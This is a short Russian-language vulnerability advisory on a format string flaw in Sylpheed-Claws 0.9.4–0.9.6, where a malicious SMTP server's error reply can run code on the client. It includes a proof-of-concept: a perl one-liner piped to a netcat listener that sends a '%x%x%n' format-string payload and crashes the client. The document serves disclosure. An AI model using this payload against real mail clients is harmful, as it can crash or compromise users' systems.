Программа: Sylpheed-claws 0.9.6 - 0.9.4
Уязвимость обнаружена в Sylpheed и Sylpheed-Claws. Злонамеренный пользователь может скомпрометировать систему пользователя.
Уязвимость связанна с ошибкой форматной строки при обработке сообщений об ошибках от SMTP сервера. Злонамеренный SMTP сервер может возвратить специально обработанное сообщение об ошибке, чтобы выполнить произвольный код на системе пользователя.
Пример/Эксплоит:
Create a test account with smtp server localhost:1234
Then do:
perl -e 'print "535 failed %x%x%n\r\n"' | nc -l -p 1234
Then send a message.
Actual result - sylpheed crashes.
